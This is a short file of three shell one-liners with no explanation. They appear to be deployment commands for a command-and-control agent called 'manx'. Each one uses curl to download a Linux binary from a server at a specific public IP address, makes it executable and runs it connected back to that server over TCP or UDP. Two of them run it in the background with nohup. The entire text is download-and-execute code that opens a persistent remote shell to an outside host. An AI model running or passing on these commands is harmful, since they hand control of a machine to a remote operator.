server="http://3.109.217.209:8888"; socket="3.109.217.209:7010"; contact="tcp"; curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > manx.go; chmod +x manx.go; ./manx.go -http $server -socket $socket -contact $contact -v server="http://3.109.217.209:8888"; socket="3.109.217.209:7011"; contact="udp"; agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; nohup ./$agent -http $server -socket $socket -contact $contact & server="http://3.109.217.209:8888"; socket="3.109.217.209:7010"; contact="tcp"; agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null; nohup ./$agent -http $server -socket $socket -contact $contact &